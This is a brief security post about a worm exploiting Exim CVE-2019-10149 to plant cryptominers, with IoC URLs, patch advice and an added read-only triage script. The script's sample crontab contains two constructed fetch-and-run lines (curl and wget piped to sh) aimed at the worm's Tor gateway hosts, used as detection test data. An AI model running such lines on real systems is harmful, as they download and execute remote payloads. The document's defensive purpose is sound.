Millions Of Servers Attacked By Exim Mining Worm

A new worm has been observed exploiting the recently disclosed Exim vulnerability CVE-2019-10149 to install cryptocurrency miners on affected mail servers.

The worm identifies new target servers using a Python-based port-scanning module, then runs an initial script to install itself on each new server. Several further scripts are downloaded and executed to create cron jobs that maintain persistence and fetch other payloads. The worm also adds its own RSA authentication key to the server’s root directory.

Look for any unfamiliar cron jobs in your crontabs and remove them, then restore the legitimate cron jobs from existing backups.

At the time of publication, only a cryptocurrency mining module has been observed being installed by the worm, although other payloads may be installed in the future.

Indicators of Compromise

URLs

  • an7kmd2wp4xo7hpr.onion[.]sh
  • an7kmd2wp4xo7hpr.tor2web[.]io
  • an7kmd2wp4xo7hpr.tor2web[.]su
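To turn the cron-job check and the IoC list above into something an admin can run, here is a read-only triage script. It is an added example, not code from the original post or from any tool the post mentions: it greps the usual cron locations and root's SSH authorized_keys (the two persistence spots the post describes) for the three IoC hostnames, and lists the keys in root's authorized_keys so an unfamiliar one stands out. The sample crontab it checks itself against is constructed for illustration; the extra "tor2web|.onion" match is my own broader heuristic, not something the post states.

```shell
#!/bin/sh
# Added example, not from the original post: read-only triage for the cron and
# authorized_keys persistence the post describes. Run "sh triage.sh --scan"
# as root to check a live host; without --scan it only checks a constructed
# sample crontab so the functions can be exercised safely anywhere.

# The three IoC hostnames from the post, with "[.]" defanging removed so they
# match real file content. The trailing "tor2web|\.onion" alternation is an
# assumption/heuristic of mine: it also flags any other Tor gateway reference,
# which is worth a look on a mail server regardless of this worm.
IOC_REGEX='an7kmd2wp4xo7hpr\.(onion\.sh|tor2web\.(io|su))|tor2web|\.onion'

# count_ioc_hits FILE: print the number of lines in FILE matching IOC_REGEX.
# Prints 0 for a missing or unreadable file and never fails, so it is safe
# to call under "set -e".
count_ioc_hits() {
    n=$(grep -c -E "$IOC_REGEX" "$1" 2>/dev/null) || true
    printf '%s\n' "${n:-0}"
}

# show_ioc_hits FILE: print "file:lineno:line" for each matching line.
show_ioc_hits() {
    [ -r "$1" ] || return 0
    grep -n -E "$IOC_REGEX" "$1" 2>/dev/null | sed "s|^|$1:|"
}

# scan_host: walk the usual cron locations plus root's authorized_keys,
# report every hit, then list root's keys (type and comment) for review.
# Returns 0 when nothing matched, 1 otherwise. Unreadable files are skipped.
scan_host() {
    total=0
    for f in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* \
             /var/spool/cron/crontabs/* /var/spool/cron/* \
             /root/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        show_ioc_hits "$f"
        total=$(( total + $(count_ioc_hits "$f") ))
    done
    if [ -r /root/.ssh/authorized_keys ]; then
        echo "== keys in /root/.ssh/authorized_keys (type, comment) =="
        # Compare against the keys you know you installed; the post says the
        # worm adds its own RSA key for root.
        awk '/^[^#]/ && NF >= 2 { print $1, ($3 == "" ? "(no comment)" : $3) }' \
            /root/.ssh/authorized_keys
    fi
    echo "total IoC hits: $total"
    [ "$total" -eq 0 ]
}

# --- constructed sample crontab for a self-check (not a real capture) ---
SAMPLE_CRON=$(mktemp)
trap 'rm -f "$SAMPLE_CRON"' EXIT
cat > "$SAMPLE_CRON" <<'EOF'
# legitimate entry kept by the admin
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
# two persistence entries modelled on the IoC hosts (constructed)
*/5 * * * * root curl -s http://an7kmd2wp4xo7hpr.tor2web.io/x | sh
@reboot root wget -qO- http://an7kmd2wp4xo7hpr.onion.sh/x | sh
EOF

echo "sample hits: $(count_ioc_hits "$SAMPLE_CRON")"   # prints 2
show_ioc_hits "$SAMPLE_CRON"

# Only touch the live host when explicitly asked.
if [ "${1:-}" = "--scan" ]; then
    scan_host
fi
```

The script reports rather than removes: once a hit is confirmed, follow the post's advice and restore the affected crontab from a known-good backup, and replace root's authorized_keys with the set of keys you can account for.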

Resolution

Patch every Exim installation in your organization and make sure it is updated to the most recent version, 4.92 at the time of writing.

Jason Davies

UK based technology professional, with an interest in computer security and telecoms.
